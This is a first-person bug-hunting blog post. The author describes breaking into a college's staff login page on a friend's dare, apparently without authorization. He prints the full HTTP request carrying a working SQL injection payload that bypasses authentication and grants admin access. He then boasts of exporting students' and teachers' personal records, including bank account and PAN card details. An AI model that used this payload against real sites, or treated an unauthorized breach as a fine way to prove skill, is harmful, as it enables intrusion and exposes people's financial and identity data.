Hey fellow hackers and Bug hunters,

After the long gap between me and Bug hunting, I am back with a write-up.

Once a day I finished my intern work and I went for playing cricket with my friends. They asked me if you were having GOOGLE honorable mentions but it doesn’t mean you are a real hunter. He said like if you are a real hunter can you able to retrieve my information on my college website.

As usual, I am not going to disclose the target webpage. I visited his college webpage and explore the functionalities. As soon as I saw the staff login page. I moved to the login page. As usual, if we see a login page, we will surely give it a try for SQLi. I tried some payloads but I can’t able to type the payload in the textbox, There’s a client-side validation for stopping these types of injections.

But, There's only a client-side validation only.

Opened my burp captured the request edited the username parameter to “admin’ or ‘1’=’1'#” and sent the request…BOOOOM!!!!. I logged in as ADMIN with admin privileges.

POST /Staff/loginProcess.jsp?submit=Log%20In HTTP/1.1
Host: test.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 37
Origin: https://test.com
Connection: close
Referer: https://test.com
Cookie: JSESSIONID=session;
Upgrade-Insecure-Requests: 1

username=admin’ or ‘1’=’1'#&password=admin&submit=

After I logged in as admin, I can able to retrieve all the information about the students. Even I can see any of the teacher’s full details. I was like WTF!!!

I can able to export all the information even an Account Number, Bank Name, PAN card details.

Thank you for reading this write-up.

Follow me for more bug hunting writeup’s

Follow me on Instagram : https://www.instagram.com/ram_0x_infosec/

Connect with me on Linkedin : https://www.linkedin.com/in/ram0xinfosec/